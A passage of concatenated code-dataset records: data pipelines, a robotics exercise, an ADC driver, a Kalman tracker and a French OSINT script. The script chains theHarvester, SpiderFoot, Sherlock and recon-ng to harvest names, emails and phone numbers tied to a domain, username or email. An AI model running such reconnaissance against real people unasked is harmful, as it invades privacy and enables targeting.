postgres_conn_id='psql_conn',\n                               sql=script,\n                               dag=dag)\n        t_a >> t_b \n        t_a = t_b","sub_path":"warehouse/dags/LoadData.py","file_name":"LoadData.py","file_ext":"py","file_size_in_byte":4937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"228092089","text":"import argparse\n\nimport os\nimport sys\nimport re\n\n\nmy_parser = argparse.ArgumentParser(description='Automatisation des outils OSINT')\n\nmy_parser.add_argument('-u', metavar='Nom d\\'utilisateur', type=str, help='Le nom d\\'utilisateur de scan')\nmy_parser.add_argument('-d', metavar='Nom de domaine', type=str, help='Nom de domaine de scan')\nmy_parser.add_argument('-e', metavar='Adresse email',type=str, help='Adresse email de scan')\n\nargs=my_parser.parse_args()\n\n\nregex_domaine = \"^((?!-)[A-Za-z0-9-]\" +\"{1,63}(?<!-)\\\\.)\" +\"+[A-Za-z]{2,6}$\"\nregex_username = \"^[A-Za-z][A-Za-z0-9._-]*$\"\nregex_email = \"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\\\.[A-Za-z]{2,6}$\"\n\nif args.d:\n    donnee=args.d\n    if not re.search(regex_domaine, donnee):\n        print('Le nom de domaine saisie est incorrect.\\nUn nom de domaine doit etre sur la forme exemple.com.')\n    else : \n        os.chdir(os.getcwd()+'/metagoofil')\n        os.system(\"python3 metagoofil.py -d \"+donnee+\" -t pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx -o MetagoofilResults\") \n        os.chdir('..')\n        os.chdir(os.getcwd()+'/theHarvester')\n        os.system(\"python3 theHarvester.py -d \"+donnee+\" -g -p -s --screenshot theHarvesterSSResults -v -f theHarvesterResults -b all\")\n        os.chdir('..')\n        os.chdir(os.getcwd()+'/spiderfoot')\n        os.system(\"python3 ./sf.py -m sfp_spider,sfp_names,sfp_email,sfp_phone -s \"+donnee+\" -q -F HUMAN_NAME,EMAILADDR,PHONE_NUMB\")\n        os.chdir('..')\n        os.chdir(os.getcwd()+'/recon-ng')\n        str=' '+donnee+'\\n'\n        temp = open('temp1.txt', \"w+\")\n        with open('domain_file', 'r') as f:\n            for line in f:\n                if line.startswith('options set SOURCE'):line = line.strip() + str\n                temp.write(line)\n        temp.close()\n        #shutil.move('temp.txt', 'username_file.txt')\n        os.system(\"python3 recon-ng -r temp1.txt\")\n        os.chdir('..')\n    \nif args.u:\n    donnee=args.u\n    if not re.search(regex_username, donnee):\n        print('Le nom d\\'utilisateur saisie est incorrect.\\nUn nom d\\'utilisateur doit commencer un caractere et ne contient pas les symboles.')\n    else:\n        os.chdir(os.getcwd()+'/spiderfoot')\n        os.system(\"python3 ./sf.py -m sfp_spider,sfp_accounts -s \\\"\"+donnee+\"\\\" -q -n\")\n        os.chdir('..')\n        os.chdir(os.getcwd()+'/sherlock')\n        #print(os.getcwd())\n        os.system(\"python3 sherlock \"+donnee+\" -o SherlockResults \")\n        os.chdir('..')\n        os.chdir(os.getcwd()+'/recon-ng')\n        str=' '+donnee+'\\n'\n        temp = open('temp.txt', \"w+\")\n        with open('username_file', 'r') as f:\n            for line in f:\n                if 
line.startswith('options set SOURCE'):line = line.strip() + str\n temp.write(line)\n temp.close()\n #shutil.move('temp.txt', 'username_file.txt')\n os.system(\"python3 recon-ng -r temp.txt\")\n os.chdir('..')\n \nif args.e:\n donnee=args.e\n if not re.search(regex_email, donnee):\n print('L\\'adresse email saisie est incorrecte.\\nL\\'adresse email doit etre sur la forme Abc123_@example.com')\n else:\n os.chdir(os.getcwd()+'/spiderfoot')\n os.system(\"python3 ./sf.py -m sfp_spider,sfp_crawlr,sfp_format,sfp_email,sfp_hunter -s \"+donnee+\" -q -F HUMAN_NAME,EMAILADDR,PHONE_NUMB\")\n os.chdir('..')","sub_path":"OSINT/osint.py","file_name":"osint.py","file_ext":"py","file_size_in_byte":3230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"512224551","text":"# Copyright 2017 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"`data_ingestion.py` is a Dataflow pipeline which reads a file and writes its\ncontents to a BigQuery table.\nThis example does not do any transformation on the data.\n\"\"\"\n\nfrom __future__ import absolute_import\n\nimport argparse\nimport json\nimport logging\nimport re\nimport apache_beam as beam\n\nfrom apache_beam.options.pipeline_options import PipelineOptions\nfrom apache_beam.io.gcp.internal.clients import bigquery\n\nfrom google.protobuf.json_format import MessageToDict\nfrom google.protobuf.json_format import MessageToJson\n\nfrom protos import addressbook_pb2\n\nclass JsonCoder(object):\n \"\"\"A JSON coder interpreting each line as a JSON string.\"\"\"\n\n def encode(self, x):\n return json.dumps(x)\n\n def decode(self, x):\n return json.loads(x)\n\nclass ProtoToDict(beam.DoFn):\n def process(self, element):\n person = addressbook_pb2.Person()\n person.ParseFromString(element)\n yield MessageToDict(person)\n\n\ndef run(argv=None):\n \"\"\"The main function which creates the pipeline and runs it.\"\"\"\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '--input',\n dest='input',\n required=False,\n help='Input file to read. 
This can be a local file or '\n 'a file in a Google Storage Bucket.',\n default='gs://jk-bq-dev-datasets/test.tfrecords')\n\n parser.add_argument('--output',\n dest='output',\n required=False,\n help='Output BQ table to write results to.',\n default='sandbox.person')\n\n known_args, pipeline_args = parser.parse_known_args(argv)\n\n table_spec = known_args.output \n\n\n# p = beam.Pipeline(options=PipelineOptions(pipeline_args))\n# _ = (p\n with beam.Pipeline(options=PipelineOptions(pipeline_args)) as p:\n (p\n | 'Read from a TFRecords' >> beam.io.ReadFromTFRecord(known_args.input)\n | 'Transform to Dict' >> beam.ParDo(ProtoToDict())\n | 'Write to BigQuery' >> beam.io.WriteToBigQuery(\n table_spec,\n #schema=table_schema,\n write_disposition=beam.io.BigQueryDisposition.WRITE_APPEND,\n create_disposition=beam.io.BigQueryDisposition.CREATE_NEVER))\n\n# p.run().wait_until_finish()\n\n\nif __name__ == '__main__':\n logging.getLogger().setLevel(logging.INFO)\n run()\n","sub_path":"beam/proto_to_bq/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"401425167","text":"def add_team():\n\ttemp_team_dictionary = {}\n\n\tteam_number = int(input(\"What is your team's team number? \"))\n\t\n\ttemp_team_dictionary[\"team_name\"] = input(\"What is your team's name? \")\n\ttemp_team_dictionary[\"robot_name\"] = input(\"What is your robot's name? \")\n\ttemp_team_dictionary[\"robot_p_language\"] = input(\"What is your robot's programming language? \")\n\ttemp_team_dictionary[\"robot_width\"] = input(\"What is your robot's width? \")\n\ttemp_team_dictionary[\"robot_height\"] = input(\"What is your robot's height? \")\n\ttemp_team_dictionary[\"robot_camera\"] = input(\"Does your robot have a camera vision system? \")\n\ttemp_team_dictionary[\"robot_drivetrain\"] = int(input(\"How many drivetrain motors does your robot have? \"))\n\t\n\tteams[team_number] = temp_team_dictionary\n\ndef view_or_modify_team(team_view):\n\tif team_view in teams:\n\t\tinformation_category = input(\"What category would you like to view or modify? \")\n\t\tif information_category in teams[team_view]:\n\t\t\tprint(teams[team_view][information_category])\n\t\t\tnew_info = input(\"What would you like to change this value to? 
\")\n\t\t\tteams[team_view][information_category] = new_info\n\t\telse:\n\t\t\tprint(\"This is not an information category.\")\n\telse:\n\t\tprint(\"This is not an existing team number.\")\n\ndef remove_team(delete_team):\n\tif delete_team in teams:\n\t\tteams.pop(delete_team, None)\n\telse:\n\t\tprint(\"This is not an existing team number.\")\n\ndef search_team(search_teams):\n\tfor team, category in teams.items():\n\t\tfound_team = False\n\t\tif search_teams == category[\"team_name\"]:\n\t\t\tprint(\"This is an existing team in the dictionary.\")\n\t\t\tfound_team = True\n\t\t\tbreak\n\t\telif search_teams[0].isdigit() and int(search_teams) == team:\n\t\t\tprint(\"This is an existing team in the dictionary.\")\n\t\t\tfound_team = True\n\t\t\tbreak\n\tif found_team != True:\n\t\tprint(\"This is not an existing team.\")\n\ndef list_team():\n\tfor team in teams.keys():\n\t\tprint(team)\n\tprint(\"These are the current teams in the dictionary.\")\n\nteams = {\n\t1678 : {\n\t\t\"team_name\" : \"Citrus Circuits\",\n\t\t\"location\" : \"Davis, CA\", \n\t\t\"rookie_year\" : 2005, \n\t\t\"competed_in_2019_season\" : True, \n\t\t\"2019_competition_names_and_locations\" : {\n\t\t\t\"Central Valley Regional\" : \"Fresno, CA\",\n\t\t\t\"Sacramento Regional\" : \"Davis, CA\",\n\t\t\t\"Aerospace Valley Regional\" : \"Lancaster, CA\",\n\t\t\t\"Carver Division\" : \"Houston, TX\",\n\t\t\t\"Einstein Field\" : \"Houston, TX\",\n\t\t\t\"RCC Qianjiang International Robotics Invitational\" : \"Hangzhou, Zhejiang, China\",\n\t\t\t\"Chezy Champs\" : \"San Jose, CA\"\n\t\t},\n\t\t\"2019_season_awards\" : [\n\t\t\t\"Regional Chairman's Award At Central Valley Regional\",\n\t\t\t\"Regional Winners At Central Valley Regional\",\n\t\t\t\"FIRST Dean's List Finalist Award\",\n\t\t\t\"Regional Winners At Sacramento Regional\",\n\t\t\t\"Industrial Design Award Sponsored By General Motors\",\n\t\t\t\"Regional Winners At Aerospace Valley Regional\",\n\t\t\t\"Excellence In Engineering Award Sponsered By Delphi\",\n\t\t\t\"Championship Subdivision Winner In Carver Divison\",\n\t\t\t\"Entrepreneurship Award Sponsored By Kleiner Perkins Caufield And Byers\"]\n\t},\n\t4322 : {\n\t\t\"team_name\" : \"Clockwork Oranges\",\n\t\t\"location\" : \"Orange, CA\",\n\t\t\"rookie_year\" : 2012,\n\t\t\"competed_in_2019_season\" : True,\n\t\t\"2019_competition_names_and_locations\" : {\n\t\t\t\"San Diego Regional Presented By Qualcomm\" : \"Del Mar, CA\",\n\t\t\t\"Las Vegas Regional\" : \"Las Vegas, NV\",\n\t\t\t\"Einstein Field\" : \"Houston, TX\",\n\t\t\t\"Battleship Blast Monday\" : \"San Pedro, CA\",\n\t\t\t\"Beach Blitz\" : \"Huntington Beach, CA\"\n\t\t},\n\t\t\"2019_season_awards\" : [\n\t\t\t\"FIRST Dean's List Finalist Award\",\n\t\t\t\"FIRST Dean's List Award\"]\n\t},\n\t5458 : {\n\t\t\"team_name\" : \"Digital Minds\",\n\t\t\"location\" : \"Woodland, CA\",\n\t\t\"rookie_year\" : 2015,\n\t\t\"competed_in_2019_season\" : True,\n\t\t\"2019_competition_names_and_locations\" : {\n\t\t\t\"Central Valley Regional\" : \"Fresno, CA\",\n\t\t\t\"Sacramento Regional\" : \"Davis, CA\"\n\t\t},\n\t\t\"2019_season_awards\" : \"None\"\n\t},\n\t1 : {\n\t\t\"team_name\" : \"The Juggernauts\",\n\t\t\"location\" : \"Pontiac, MI\",\n\t\t\"rookie_year\" : 1997,\n\t\t\"competed_in_2019_season\" : True,\n\t\t\"2019_competition_names_and_locations\" : {\n\t\t\t\"FIM District Center Line Event\" : \"Center Line, MI\",\n\t\t\t\"FIM District Troy Event\" : \"Troy, MI\"\n\t\t},\n\t\t\"2019_season_awards\":\"Imagery Award In Honor Of Jack Kamen\"\n\t},\n\t7229 
: {\n\t\t\"team_name\" : \"Electronic Eagles\",\n\t\t\"location\" : \"Sacramento, CA\",\n\t\t\"rookie_year\" : 2018,\n\t\t\"competed_in_2019_season\" : True,\n\t\t\"2019_competition_names_and_locations\" : {\n\t\t\t\"Sacramento Regional\" : \"Davis, CA\"\n\t\t}, \n\t\t\"2019_season_awards\" : \"None\"\n\t}\n}\n\nwhile True:\n\tinitial_user_request = input(\"Choose from: 'add' 'view_or_modify' 'remove' 'search' 'list' \")\n\tif initial_user_request == \"add\":\n\t\tadd_team()\n\t\n\telif initial_user_request == \"view_or_modify\":\n\t\tteam_view = int(input(\"Which team would you like to view? \"))\n\t\tview_or_modify_team(team_view)\n\n\telif initial_user_request == \"remove\":\n\t\tdelete_team = int(input(\"Which team would you like to remove? \"))\n\t\tremove_team(delete_team)\n\n\telif initial_user_request == \"search\":\n\t\tsearch_teams = input(\"Which team would you like to see? (By name or number) \")\n\t\tsearch_team(search_teams)\n\n\telif initial_user_request == \"list\":\n\t\tlist_team()\n\n\telse:\n\t\tprint(\"That is not a search option.\")\n","sub_path":"ch_3_assign_lucca_braudagan.py","file_name":"ch_3_assign_lucca_braudagan.py","file_ext":"py","file_size_in_byte":5108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"4699736","text":"import socket\r\nfrom cryptography.fernet import Fernet\r\nimport argparse\r\n\r\n# Argumentos\r\ndescription = \"\"\"Modo de uso:\r\n cliente.py -msj \"Mensaje a enviar\"\"\"\r\nparser = argparse.ArgumentParser(description='Port scanning',\r\n epilog=description,\r\n formatter_class=argparse.RawDescriptionHelpFormatter)\r\nparser.add_argument(\"-msj\", metavar='MSJ', dest=\"msj\",\r\n help=\"mensaje a enviar\", required=True)\r\nparams = parser.parse_args()\r\n\r\n# Objeto para cifrar\r\nclave = Fernet.generate_key()\r\ncipher_suite = Fernet(clave)\r\n\r\n# Clave\r\nfile = open('clave.key', 'wb')\r\nfile.write(clave)\r\nfile.close()\r\n\r\n# Convertir a Bytes\r\nmensaje = params.msj\r\nmensajeBytes = mensaje.encode()\r\n\r\n# Ciframos\r\nmsj_cifrado = cipher_suite.encrypt(mensajeBytes)\r\nprint(\"Mensaje enviado:\\n\", mensaje)\r\n\r\n# Datos de conexion\r\nIP = '127.0.0.1'\r\nPuerto = 1333\r\nBuffer = 2048\r\n\r\n# Conexion\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((IP, Puerto))\r\ns.send(msj_cifrado)\r\nrespuesta = s.recv(Buffer).decode()\r\ns.close()\r\n\r\nprint(\"Respuesta recibida:\", respuesta)\r\n","sub_path":"Python/E9/clienteTCP.py","file_name":"clienteTCP.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"169496903","text":"import config\nimport RPi.GPIO as GPIO\nfrom datetime import datetime\nimport numpy as np\n\n\nScanMode = 0\n\n\n# gain channel\nADS1256_GAIN_E = {'ADS1256_GAIN_1' : 0, # GAIN 1\n 'ADS1256_GAIN_2' : 1, # GAIN 2\n 'ADS1256_GAIN_4' : 2, # GAIN 4\n 'ADS1256_GAIN_8' : 3, # GAIN 8\n 'ADS1256_GAIN_16' : 4,# GAIN 16\n 'ADS1256_GAIN_32' : 5,# GAIN 32\n 'ADS1256_GAIN_64' : 6,# GAIN 64\n }\n\n# data rate\nADS1256_DRATE_E = {'ADS1256_30000SPS' : 0xF0, # reset the default values\n 'ADS1256_15000SPS' : 0xE0,\n 'ADS1256_7500SPS' : 0xD0,\n 'ADS1256_3750SPS' : 0xC0,\n 'ADS1256_2000SPS' : 0xB0,\n 'ADS1256_1000SPS' : 0xA1,\n 'ADS1256_500SPS' : 0x92,\n 'ADS1256_100SPS' : 0x82,\n 'ADS1256_60SPS' : 0x72,\n 'ADS1256_50SPS' : 0x63,\n 'ADS1256_30SPS' : 0x53,\n 'ADS1256_25SPS' : 0x43,\n 'ADS1256_15SPS' : 0x33,\n 'ADS1256_10SPS' : 0x20,\n 'ADS1256_5SPS' : 
0x13,\n 'ADS1256_2d5SPS' : 0x03\n }\n\n# registration definition\nREG_E = {'REG_STATUS' : 0, # x1H\n 'REG_MUX' : 1, # 01H\n 'REG_ADCON' : 2, # 20H\n 'REG_DRATE' : 3, # F0H\n 'REG_IO' : 4, # E0H\n 'REG_OFC0' : 5, # xxH\n 'REG_OFC1' : 6, # xxH\n 'REG_OFC2' : 7, # xxH\n 'REG_FSC0' : 8, # xxH\n 'REG_FSC1' : 9, # xxH\n 'REG_FSC2' : 10, # xxH\n }\n\n# command definition\nCMD = {'CMD_WAKEUP' : 0x00, # Completes SYNC and Exits Standby Mode 0000 0000 (00h)\n 'CMD_RDATA' : 0x01, # Read Data 0000 0001 (01h)\n 'CMD_RDATAC' : 0x03, # Read Data Continuously 0000 0011 (03h)\n 'CMD_SDATAC' : 0x0F, # Stop Read Data Continuously 0000 1111 (0Fh)\n 'CMD_RREG' : 0x10, # Read from REG rrr 0001 rrrr (1xh)\n 'CMD_WREG' : 0x50, # Write to REG rrr 0101 rrrr (5xh)\n 'CMD_SELFCAL' : 0xF0, # Offset and Gain Self-Calibration 1111 0000 (F0h)\n 'CMD_SELFOCAL' : 0xF1, # Offset Self-Calibration 1111 0001 (F1h)\n 'CMD_SELFGCAL' : 0xF2, # Gain Self-Calibration 1111 0010 (F2h)\n 'CMD_SYSOCAL' : 0xF3, # System Offset Calibration 1111 0011 (F3h)\n 'CMD_SYSGCAL' : 0xF4, # System Gain Calibration 1111 0100 (F4h)\n 'CMD_SYNC' : 0xFC, # Synchronize the A/D Conversion 1111 1100 (FCh)\n 'CMD_STANDBY' : 0xFD, # Begin Standby Mode 1111 1101 (FDh)\n 'CMD_RESET' : 0xFE, # Reset to Power-Up Values 1111 1110 (FEh)\n }\n\nclass ADS1256:\n def __init__(self):\n self.rst_pin = config.RST_PIN\n self.cs_pin = config.CS_PIN\n self.drdy_pin = config.DRDY_PIN\n\n # Hardware reset\n def ADS1256_reset(self):\n config.digital_write(self.rst_pin, GPIO.HIGH)\n config.delay_ms(200)\n config.digital_write(self.rst_pin, GPIO.LOW)\n config.delay_ms(200)\n config.digital_write(self.rst_pin, GPIO.HIGH)\n \n def ADS1256_WriteCmd(self, reg):\n config.digital_write(self.cs_pin, GPIO.LOW)#cs 0\n config.spi_writebyte([reg])\n config.digital_write(self.cs_pin, GPIO.HIGH)#cs 1\n \n def ADS1256_WriteReg(self, reg, data):\n config.digital_write(self.cs_pin, GPIO.LOW)#cs 0\n config.spi_writebyte([CMD['CMD_WREG'] | reg, 0x00, data])\n config.digital_write(self.cs_pin, GPIO.HIGH)#cs 1\n \n def ADS1256_Read_data(self, reg):\n config.digital_write(self.cs_pin, GPIO.LOW)#cs 0\n config.spi_writebyte([CMD['CMD_RREG'] | reg, 0x00])\n data = config.spi_readbytes(1)\n config.digital_write(self.cs_pin, GPIO.HIGH)#cs 1\n \n return data\n \n def ADS1256_WaitDRDY(self):\n \n for i in range(0,400000,1):\n if(config.digital_read(self.drdy_pin) == 0):\n \n break\n if(i >= 400000):\n print (\"Time Out ...\\r\\n\")\n \n \n def ADS1256_ReadChipID(self):\n self.ADS1256_WaitDRDY()\n id = self.ADS1256_Read_data(REG_E['REG_STATUS'])\n id = id[0] >> 4\n # print 'ID',id\n return id\n \n #The configuration parameters of ADC, gain and data rate\n def ADS1256_ConfigADC(self, gain, drate):\n self.ADS1256_WaitDRDY()\n buf = [0,0,0,0]\n buf[0] = (0<<3) | (1<<2) | (0<<1)\n buf[1] = 0x08\n buf[2] = (0<<5) | (0<<3) | (gain<<0)\n buf[3] = drate\n \n config.digital_write(self.cs_pin, GPIO.LOW)#cs 0\n config.spi_writebyte([CMD['CMD_WREG'] | 0, 0x03])\n config.spi_writebyte(buf)\n \n config.digital_write(self.cs_pin, GPIO.HIGH)#cs 1\n config.delay_ms(1) \n\n\n\n def ADS1256_SetChannal(self, Channal):\n if Channal > 7:\n return 0\n self.ADS1256_WriteReg(REG_E['REG_MUX'], (Channal<<4) | (1<<3))\n\n def ADS1256_SetDiffChannal(self, Channal):\n if Channal == 0:\n self.ADS1256_WriteReg(REG_E['REG_MUX'], (0 << 4) | 1) #DiffChannal AIN0-AIN1\n elif Channal == 1:\n self.ADS1256_WriteReg(REG_E['REG_MUX'], (2 << 4) | 3) #DiffChannal AIN2-AIN3\n elif Channal == 2:\n self.ADS1256_WriteReg(REG_E['REG_MUX'], (4 << 4) | 
5) #DiffChannal AIN4-AIN5\n elif Channal == 3:\n self.ADS1256_WriteReg(REG_E['REG_MUX'], (6 << 4) | 7) #DiffChannal AIN6-AIN7\n\n def ADS1256_SetMode(self, Mode):\n ScanMode = Mode\n\n def ADS1256_init(self):\n if (config.module_init() != 0):\n return -1\n self.ADS1256_reset()\n id = self.ADS1256_ReadChipID()\n if id == 3 :\n print(\"ID Read success \")\n else:\n print(\"ID Read failed \")\n return -1\n self.ADS1256_ConfigADC(ADS1256_GAIN_E['ADS1256_GAIN_1'], ADS1256_DRATE_E['ADS1256_7500SPS'])\n return 0\n \n def ADS1256_Read_ADC_Data(self):\n self.ADS1256_WaitDRDY()\n config.digital_write(self.cs_pin, GPIO.LOW)#cs 0\n config.spi_writebyte([CMD['CMD_RDATA']])\n buf = config.spi_readbytes(3)\n \n read = 0\n read = (buf[0]<<16) & 0xff0000\n read |= (buf[1]<<8) & 0xff00\n read |= (buf[2]) & 0xff\n config.digital_write(self.cs_pin, GPIO.HIGH)#cs 1\n if (read & 0x800000):\n read |= 0xFF000000\n \n return read\n \n def ADS1256_GetChannalValue(self, Channel):\n if(ScanMode == 0):# 0 Single-ended input 8 channel1 Differential input 4 channe \n if(Channel>=8):\n return 0\n self.ADS1256_SetChannal(Channel)\n #self.ADS1256_WriteCmd(CMD['CMD_SYNC'])\n # config.delay_ms(10)\n #self.ADS1256_WriteCmd(CMD['CMD_WAKEUP'])\n # config.delay_ms(200)\n Value = self.ADS1256_Read_ADC_Data()\n else:\n if(Channel>=4):\n return 0\n self.ADS1256_SetDiffChannal(Channel)\n self.ADS1256_WriteCmd(CMD['CMD_SYNC'])\n # config.delay_ms(10) \n self.ADS1256_WriteCmd(CMD['CMD_WAKEUP'])\n # config.delay_ms(10) \n Value = self.ADS1256_Read_ADC_Data()\n return Value\n \n def ADS1256_GetAll(self):\n ADC_Value = [0,0,0,0,0,0,0,0]\n for i in range(0,8,1):\n ADC_Value[i] = self.ADS1256_GetChannalValue(i)\n return ADC_Value\n \n def ADS1256_GetSingleChannel(self, channel):\n self.ADS1256_SetChannal(channel)\n #self.ADS1256_WriteCmd(CMD['CMD_SYNC'])\n #config.delay_ms(10)\n #self.ADS1256_WriteCmd(CMD['CMD_WAKEUP'])\n #config.delay_ms(100)\n #print(np.mean(self.timer))\n Value = self.ADS1256_Read_ADC_Data()\n return Value\n### END OF FILE ###\n\n","sub_path":"raspberry/ADS1256.py","file_name":"ADS1256.py","file_ext":"py","file_size_in_byte":7971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"171229112","text":"import numpy as np\nimport math\n\nclass AugmentKalmanFilter():\n \"\"\"Augment KF for target tracking.\n \"\"\"\n \n def __init__(self, time_interval, gate_1, gate_2, max_tracking_times, sigmaax, sigmaay, sigmaox, sigmaoy):\n \"\"\"The basic configuration parameters are as follow:\n time_interval - Time interval\n sigmaax - Sigma of acceleration noise in the x direction\n sigmaay - Sigma of acceleration noise in the y direction\n noise_q - Acceleration noise matrix\n sigmaox - Sigma of observation noise in the x direction\n sigmaoy - Sigma of observation noise in the y direction\n noise_r - Observation noise matrix\n xtrue - Location of ego vehicle\n gate_associate - Association distance\n \"\"\"\n \n self.time_interval = time_interval\n \n self.noise_q = np.matrix([[sigmaax ** 2, 0],\n [0, sigmaay ** 2],])\n self.noise_r = np.matrix([[sigmaox ** 2, 0],\n [0, sigmaoy ** 2],])\n \n self.xtrue = [0, 0]\n self.gate_associate_person = gate_1\n self.gate_associate_vehicle = gate_2\n self.max_tracking_times = max_tracking_times\n \n def kf_initialize(self, color_map):\n \"\"\"Initialize akf.\n \"\"\"\n \n # Initialize state xx and covariance px.\n self.xx = np.matrix([])\n self.px = np.matrix([])\n self.xx_cube = np.matrix([])\n self.xx_class = []\n \n # pre_aug stores the 
location of targets temporarily.\n self.pre_aug = np.matrix([])\n self.pre_aug_cube = np.matrix([])\n self.pre_aug_class = []\n \n # xx_mistracking stores wrong tracking information, and it gets higher when wrong tracking happens.\n self.xx_mistracking = []\n self.xx_color_idx = []\n self.color_map = color_map\n \n def kf_predict(self):\n \"\"\"KF predict.\n \"\"\"\n \n xx = self.xx\n px = self.px\n xx_cube = self.xx_cube\n xx_class = self.xx_class\n \n ti = self.time_interval\n q = self.noise_q\n \n if xx.shape[1] == 0:\n return\n else:\n f = np.matrix([[1, ti, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, ti],\n [0, 0, 0, 1],])\n g = np.matrix([[0.5 * ti ** 2, 0],\n [ti, 0],\n [0, 0.5 * ti ** 2],\n [0, ti],])\n ff = f\n gg = g\n qq = q\n while ff.shape[0] < xx.shape[0]:\n ler = ff.shape[0]\n lec = ff.shape[1]\n ff = np.row_stack((ff, np.zeros((4, lec))))\n ff = np.column_stack((ff, np.zeros((ler + 4, 4))))\n ii = range(-4, 0)\n jj = range(-4, 0)\n for f_i in range(0, 4):\n for f_j in range(0, 4):\n ff[ii[f_i], jj[f_j]] = f[f_i, f_j]\n gg = np.row_stack((gg, np.zeros((4, int(lec / 2)))))\n gg = np.column_stack((gg, np.zeros((ler + 4, 2))))\n ii = range(-4, 0)\n jj = range(-2, 0)\n for g_i in range(0, 4):\n for g_j in range(0, 2):\n gg[ii[g_i], jj[g_j]] = g[g_i, g_j]\n qq = np.row_stack((qq, np.zeros((2, int(lec / 2)))))\n qq = np.column_stack((qq, np.zeros((int(ler / 2 + 2), 2))))\n ii = range(-2, 0)\n jj = range(-2, 0)\n for q_i in range(0, 2):\n for q_j in range(0, 2):\n qq[ii[q_i], jj[q_j]] = q[q_i, q_j]\n xx = ff * xx\n px = ff * px * ff.T + gg * qq * gg.T\n \n for j in range(0, int(xx_cube.shape[0] / 8)):\n xx_cube[range(8 * j, 8 * j + 8), 0] += xx[4 * j + 1, 0] * ti\n xx_cube[range(8 * j, 8 * j + 8), 2] += xx[4 * j + 3, 0] * ti\n \n self.xx = xx\n self.px = px\n self.xx_cube = xx_cube\n self.xx_class = xx_class\n return\n \n def increase_mistracking(self):\n \"\"\"Increase xx_mistracking.\n \"\"\"\n \n xx_mistracking = self.xx_mistracking\n \n if xx_mistracking == []:\n pass\n else:\n for i in range(len(xx_mistracking)):\n xx_mistracking[i] += 1\n \n self.xx_mistracking = xx_mistracking\n return\n \n def associate(self, z, z_cube, z_class):\n \"\"\"Associate.\n Initialize za, id_za and zu.\n za represents targets which have been observed and associated.\n id_za stores indexes of targets in xx.\n zu represents targets which have been observed but not associated.\n \"\"\"\n \n self.za = np.matrix([])\n self.za_cube = np.matrix([])\n self.za_class = []\n self.id_za = []\n \n self.zu = np.matrix([])\n self.zu_cube = np.matrix([])\n self.zu_class = []\n \n za = self.za\n za_cube = self.za_cube\n za_class = self.za_class\n id_za = self.id_za\n \n zu = self.zu\n zu_cube = self.zu_cube\n zu_class = self.zu_class\n \n xx = self.xx\n xx_mistracking = self.xx_mistracking\n gate_associate_person = self.gate_associate_person\n gate_associate_vehicle = self.gate_associate_vehicle\n \n if z.shape[1] == 0:\n return\n else:\n for j in range(0, z.shape[1]):\n if z_class[j] == 'person':\n gate_associate = gate_associate_person\n elif z_class[j] == 'car':\n gate_associate = gate_associate_vehicle\n distance_m = float(\"inf\")\n id_associate_best = float(\"inf\")\n for k in range(0, int(xx.shape[0] / 4)):\n xx_x = xx[4 * k, 0]\n xx_y = xx[4 * k + 2, 0]\n z_x = z[0, j]\n z_y = z[1, j]\n dd = (z_x - xx_x) ** 2 + (z_y - xx_y) ** 2\n distance = math.sqrt(dd)\n if distance < gate_associate and distance < distance_m:\n distance_m = distance\n id_associate_best = k\n # Association accomplished.\n if id_associate_best != 
float(\"inf\"):\n za_new = z[:, [j]]\n za_cube_new = z_cube[:, range(3 * j, 3 * j + 3)]\n za_class_new = z_class[j]\n id_za_new = id_associate_best\n if za.shape[1] == 0:\n za = za_new\n za_cube = za_cube_new\n za_class = [za_class_new]\n id_za = [id_za_new]\n else:\n za = np.column_stack((za, za_new))\n za_cube = np.column_stack((za_cube, za_cube_new))\n za_class.append(za_class_new)\n id_za.append(id_za_new)\n xx_mistracking[id_associate_best] = 0\n # Association failed.\n else:\n zu_new = z[:, [j]]\n zu_cube_new = z_cube[:, range(3 * j, 3 * j + 3)]\n zu_class_new = z_class[j]\n if zu.shape[1] == 0:\n zu = zu_new\n zu_cube = zu_cube_new\n zu_class = [zu_class_new]\n else:\n zu = np.column_stack((zu, zu_new))\n zu_cube = np.column_stack((zu_cube, zu_cube_new))\n zu_class.append(zu_class_new)\n \n self.za = za\n self.za_cube = za_cube\n self.za_class = za_class\n self.id_za = id_za\n \n self.zu = zu\n self.zu_cube = zu_cube\n self.zu_class = zu_class\n \n self.xx_mistracking = xx_mistracking\n return\n \n def kf_update(self):\n \"\"\"KF update.\n \"\"\"\n \n za = self.za\n za_cube = self.za_cube\n za_class = self.za_class\n id_za = self.id_za\n \n xx = self.xx\n px = self.px\n xx_cube = self.xx_cube\n xx_class = self.xx_class\n \n r = self.noise_r\n \n if za.shape[1] == 0:\n return\n else:\n h = np.matrix([[1, 0, 0, 0],\n [0, 0, 1, 0],])\n len_xx = xx.shape[0]\n len_za = za.shape[1]\n hh = np.zeros((2 * len_za, len_xx))\n zz = np.zeros((2 * len_za, 1))\n rr = np.zeros((2 * len_za, 2 * len_za))\n for j in range(0, len_za):\n ii = [2 * j, 2 * j + 1]\n jj = range(4 * id_za[j], 4 * id_za[j] + 4)\n for h_i in range(0, 2):\n for h_j in range(0, 4):\n hh[ii[h_i], jj[h_j]] = h[h_i, h_j]\n zz[ii, :] = 